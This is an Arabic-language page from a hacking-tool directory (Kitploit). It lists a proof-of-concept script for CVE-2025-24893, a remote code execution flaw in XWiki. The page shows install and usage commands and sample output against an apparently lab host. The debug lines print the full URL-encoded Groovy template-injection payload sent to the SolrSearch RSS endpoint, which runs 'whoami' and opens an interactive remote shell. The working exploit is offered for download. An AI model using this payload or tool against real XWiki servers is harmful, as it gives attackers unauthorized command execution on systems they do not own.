Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893-RCE-PoC — هذا سكريبت صغير للثغرة rce الخاصة بـ CVE-2025-24893. يدعم الإدخال/الإخراج الأساسي | Kitploit
أدوات/GitHubGitHub/gmh5225/cve-2025-24893-rce-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubgmh5225/cve-2025-24893-rce-poc

CVE-2025-24893-RCE-PoC

هذا سكريبت صغير للثغرة rce الخاصة بـ CVE-2025-24893. يدعم الإدخال/الإخراج الأساسي

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

المعلومات

يقوم هذا الدليل (PoC) أولاً باختبار SSTI، وإذا نجح، يدخل في حلقة ويتيح لك تشغيل الأوامر عن بُعد.

الأمران exec و shell يقومان حاليًا بنفس الشيء.

التثبيت

root@kitploit:~
python3 -m pip install requirements.txt

الاستخدام

الاتصال

root@kitploit:~
python3 poc.py <target>

مثال

مع تعطيل التصحيح (الوضع الافتراضي)

root@kitploit:~
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki

مع تفعيل التصحيح

سيظهر لك علم التصحيح في أعلى السكريبت عناوين URL المُنشأة. سيُنشئ ملف debug.log يحتوي على الاستجابة الخام للطلب.

root@kitploit:~
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
تنزيل الأداة